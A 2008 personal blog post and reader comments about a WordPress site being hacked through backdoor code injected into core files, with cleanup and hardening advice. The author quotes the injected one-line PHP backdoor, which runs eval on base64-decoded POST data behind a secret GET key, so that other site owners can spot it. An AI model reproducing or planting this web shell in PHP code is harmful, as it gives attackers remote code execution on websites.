Got Hacked Again

Last January WordPress.net.in has injected codes at my WordPress files in which the following WordPress files has been injected with numbers for SQL

wp-admin/admin.php
wp-admin/index.php
wp-includes/wp-db.php
wp-includes/pluggable.php
wp-includes/gettext.php
wp-includes/default-filters.php

Then again. My site has been hacked, but at this time, it is not completely hacked since I was able to check some wordpress files that has been altered. It can easily be notice if you are using Windows Live Writer. If you are using Windows Live writer and suddenly you encounter ” blog server error-server error-32700 occurred parse error, not well formed “

I saw some string like as follows :

<?php if($_GET['aee8d2759ea2c769']==”e7d557fe37ae8fd6″){ eval(base64_decode($_POST['file'])); exit; } ?>

This string should not be installed on either of the WordPress files mentioned above and needs to be deleted. The easiest method of fixing this one is to replace above mentioned files by the original installation files of WordPress that could be downloaded at their site. It is good that I gave a local copy of those files in my computer. Because that the hacked might happen again.

Again I thank gordon.dewis.ca for his post regarding this matter. further reading result good information from Other site

My main index.php was not yet hacked. I believed the hacking is not yet completed. The next time you see an error from your windows live writer. Check your WordPress Installation files.

I have made To do checklist.

I need to install .htaccess password , maybe somebody would like to make post in doing so or I will just have to search via Google.
Research for more possible security fix for my blog.
Need to update my plug-ins

It is good that I am using Windows Live Writer. So next time when your Authoring Tools make some problem try to search immediately at Google the problem that it reports. BTW I need to study this article on wordpress codex.

DOLE Hacked , Another Government Website
I was surprised to know at GMA 24 Oras report that there is another government site that has been hacked. and this is no other than DOLE ( Department of Labor and Employment ). Site was replaced with Arabic Greeting. Last time DOH was also hacked , as what I have told before, the government s...
Hacking dotPH explains the story behind the Sulit.com.ph hacking incident
As I was monitoring twitter I saw a tweet from Ade Magnaye stating a link to an explanation of dotPh from the hacking incident that happen to Sulit.com.ph somewhere in November. They have explained on how they where able to track the hacker and how they have coordinated to SEDO parking where sulit�...
Totally Hacked Reinstall
OOppppss again.. Sorry for all my visitor that comes since yesterday. My site has been totally hacked by someone who made a custom 404 page and made an affiliate links as well as custom search engine for his benefit. I will update later on too tired on doing reinstallation of my site. if you found ...

Tags: Hack, Research, Security

About the author

Dexter is a person who loves technology,new gadget, SEO, Social Media and Christianity. Follow him at twitter via @techathand and add him @ Google+ and contact us at admin@techathand.net

Interesting Comments

Note : All Comment will be subjected to Tech At Hand Dot Net Comment Policy

10 Responses to “Got Hacked Again”

KarloPinoyBlogero on March 24th, 2008 10:58 am

You know what, I think the reason why your blog is hacked often is because you disclose the plugins that you use on your blog. WordPress plugins are the ones that makes a blog vulnerable to attacks.

I’m guessing that hackers just searched for a wordpress plugin that has some security issues and landed on your blog.

KarloPinoyBlogero’s last blog post..A Pinoy Term for the Word ‘Blog’?

Reply
Dexter on March 24th, 2008 11:24 am

Thanks for the advice Karlo.. From now on I will not disclose the plug-ins that I am using..

Dexter’s last blog post..LG has introduced Advanced IPS (In-Panel-Switching) the kneading board

Reply
snoob on March 24th, 2008 12:27 pm

remember to chmod the files that you need protected.

snoob’s last blog post..?I really want to earn money online, what should I do??

Reply
KarloPinoyBlogero on March 24th, 2008 12:32 pm

No problemo!

KarloPinoyBlogero’s last blog post..A Pinoy Term for the Word ‘Blog’?

Reply
Dexter on March 24th, 2008 1:24 pm

@ snoob

any instruction on how to do it.

Dexter’s last blog post..LG has introduced Advanced IPS (In-Panel-Switching) the kneading board

Reply
Gordon on March 24th, 2008 4:20 pm

@Dexter: Check out the Codex (http://codex.wordpress.org/Hardening_WordPress).

Gordon’s last blog post..Leaping eagle ray kills boater

Reply
V_RocKs on March 24th, 2008 5:15 pm

This is crap!

I have both 2.3.3 and 2.0.11 blogs and they are all getting hacked in this manner.

This has been going on since October 2007 and there have been various new releases since then without this problem being addressed and no input from the authors of wordpress!

That is just bad news all around…

Reply
Dexter on March 24th, 2008 5:22 pm

@ V_RocKs

Any success on preventing this hack.. ?

Dexter’s last blog post..LG has introduced Advanced IPS (In-Panel-Switching) the kneading board

Reply
Fibonacci on October 23rd, 2010 2:27 am

The only thing to avoid getting hacked is to start cleaning your computer’s system because it might be infected with a key-logger virus. This is a type of virus that can record everything that you are typing on your keyboard and automatically sent them to the hacker. There are other more types of virus that can caused you to be hacked so you better have the best anti-virus installed on your computer and keep them actively running on the background.

Reply
Dexter Panganiban Reply:
October 24th, 2010 at 9:56 pm

@Fibonacci,

Agree with this one and this one. And I am happy to say that after transferring to dreamhost I have not experienced any hack

Reply